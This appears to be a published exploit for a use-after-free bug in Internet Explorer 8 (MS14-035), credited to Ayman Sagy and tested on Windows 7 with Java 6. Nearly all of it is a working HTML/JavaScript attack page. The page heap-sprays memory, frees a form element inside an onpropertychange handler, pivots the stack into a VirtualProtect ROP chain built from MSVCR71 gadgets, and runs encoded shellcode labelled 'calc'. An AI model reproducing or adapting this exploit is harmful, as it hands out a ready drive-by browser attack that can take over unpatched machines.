Internet Explorer 8 MS14-035 Use-After-Free

`<!--  
Exploit Title: MS14-035 Use-after-free Exploit for IE8  
Date: 10 Nov 2014  
Exploit Author: Ayman Sagy <[email protected]> https://www.linkedin.com/in/aymansagy  
Tested on: IE8 with Java6 on Windows7  
-->  
  
<html>  
<head><title>MS14-035 IE8 Use-after-free Exploit</title></head>  
<body>  
  
<!--  
<APPLET id="dummy" code="dummy.class" width=100 height=100>  
You need to install Java to view this page.  
</APPLET>  
-->  
<div id="mydiv">x</div>  
  
<form id="frm"></form>  
  
<div id="sprayfrm"></div>  
  
<script type="text/javascript">  
  
spraysize = 5000;  
sprayelement = document.getElementById("sprayfrm");  
sprayelement.style.cssText = "display:none";  
  
var data;  
offset = 0x506;  
buffer = unescape("%u2020%u2020");  
  
  
pivot = unescape("%u8b05%u7c34"); // stack pivot  
  
// MSVCR71  
rop = unescape("%u4cc1%u7c34"); // pop eax;ret;  
rop += unescape("%u10c2%u7c34"); // pop ecx;pop ecx;ret;  
rop += unescape("%u2462%u7c34"); // xor chain; call eax {0x7C3410C2}  
rop += unescape("%uc510%u7c38"); // writeable loc for lpflOldProtect  
rop += unescape("%u5645%u7c36"); // pop esi;ret;  
rop += unescape("%u5243%u7c34"); // ret;  
rop += unescape("%u8f46%u7c34"); // pop ebp;ret;  
rop += unescape("%u87ec%u7c34"); // call eax;  
rop += unescape("%u4cc1%u7c34"); // pop eax;ret;  
rop += unescape("%ufdff%uffff"); // {size}  
rop += unescape("%ud749%u7c34"); // neg eax;ret; {adjust size}  
rop += unescape("%u58aa%u7c34"); // add ebx, eax;ret; {size into ebx}  
rop += unescape("%u39fa%u7c34"); // pop edx;ret;  
rop += unescape("%uffc0%uffff"); // {flag}  
rop += unescape("%u1eb1%u7c35"); // neg edx;ret; {adjust flag}  
rop += unescape("%u4648%u7c35"); // pop edi;ret;  
rop += unescape("%u30ea%u7c35"); // mov eax,[eax];ret;  
rop += unescape("%u4cc1%u7c34"); // pop eax;ret;  
rop += unescape("%ua181%u7c37"); // (VP RVA + 30 - {0xEF adjustment}  
rop += unescape("%u5aeb%u7c35"); // sub eax,30;ret;  
rop += unescape("%u8c81%u7c37"); // pushad; add al,0xef; ret;  
rop += unescape("%u683f%u7c36"); // push esp;ret;  
rop += unescape("%ubc90%u1010%u1010"); // NOP / MOV ESP,0x10101010  
  
// calc  
shellcode = unescape("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u16ba%u3d14%uddf0%ud9c2%u2474%u5ff4%uc929%u32b1%u5731%u0312%u1257%uf983%udfe8%uf905%ua9f9%u01e6%uc9fa%ue46f%udbcb%u6d14%uec79%u235f%u8772%ud732%ue501%ud89a%u40a2%ud7fd%u6533%ubbc1%ue7f0%uc1bd%uc824%u0afc%u0939%u7638%u5bb2%ufd91%u4c61%u4396%u6dba%uc878%u1582%u0efd%uac76%u5efc%ubb27%u46b7%ue343%u7767%uf780%u3e54%uccad%uc12f%u1d67%uf0cf%uf247%u3dee%u0a4a%uf936%u79b5%ufa4c%u7a48%u8197%u0f96%u210a%ub75c%ud0ee%u2eb1%ude64%u247e%uc222%ue981%ufe58%u0c0a%u778f%u2b48%udc0b%u520a%ub80a%u6bfd%u644c%uc9a1%u8606%u68b6%ucc45%uf849%ua9f3%u024a%u99fc%u3322%u7677%ucc34%u3352%u86ca%u15ff%u4f43%u246a%u700e%u6a40%uf337%u1261%uebcc%u1703%uab88%u65f8%u5981%udaff%u4ba2%ubd9c%u1730%u4163");  
  
/*  
_______0x1cc_____  
| |  
\|/ |  
Junk ROP Shellcode Pivot Junk  
2 3 1  
*/   
while (buffer.length < (offset - 0x1cc/2)) buffer += unescape("%u4cc2%u7c34");  
  
buffer += rop;  
buffer += shellcode;  
while (buffer.length < offset) buffer += unescape("%u4cc2%u7c34");  
while (buffer.length < 0x1000) buffer += buffer;  
  
  
  
data = buffer.substring(0,offset) + pivot + rop + shellcode  
data += buffer.substring(0,0x800-offset-rop.length-shellcode.length-pivot.length);  
  
while (data.length < 0x80000) data += data;  
  
for (var i = 0; i < 0x450; i++) // payload heap spray with corelanc0d3r's DEPS  
{  
var obj = document.createElement("button");  
obj.title = data.substring(0,0x40000-0x58);  
//obj.style.fontFamily = data.substring(0,0x40000-0x58);  
sprayelement.appendChild(obj);  
}  
  
  
block = unescape( // Literal string to avoid heap allocation  
"%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca"+  
"%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca"+  
"%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca"+  
"%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca"+  
"%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca");  
  
  
blocks = new Array();  
  
for (i = 0; i < spraysize; i++) { // spray 1  
blocks.push(document.createElement("button"));  
blocks[i].setAttribute("title",block.substring(0, block.length));  
sprayelement.appendChild(blocks[i]);  
}  
  
for (i = spraysize/2; i < spraysize; i++) { // free some blocks  
blocks[i].setAttribute("title","");  
}  
  
  
  
var newdiv = document.createElement('div');  
newdiv.innerHTML = "<textarea id='CTextArea'></textarea>";  
  
document.getElementById("frm").appendChild(newdiv);  
var newdiv2 = document.createElement('div');  
newdiv2.innerHTML = "<input id='CInput' type='checkbox' onpropertychange='crash()'></input>";  
document.getElementById("frm").appendChild(newdiv2);  
  
  
document.getElementById("CInput").checked = true;  
  
trigger = true;  
  
document.getElementById("frm").reset();  
  
  
  
function crash() {  
  
if (trigger) {  
document.getElementById("frm").innerHTML = ""; // Free object, trigger bug  
CollectGarbage();  
  
for (i = spraysize/2; i < spraysize; i++) { // spray 2  
blocks[i].setAttribute("title",block.substring(0, block.length));  
}  
}  
}  
  
</script>  
  
</body>  
</html>  
  
  
`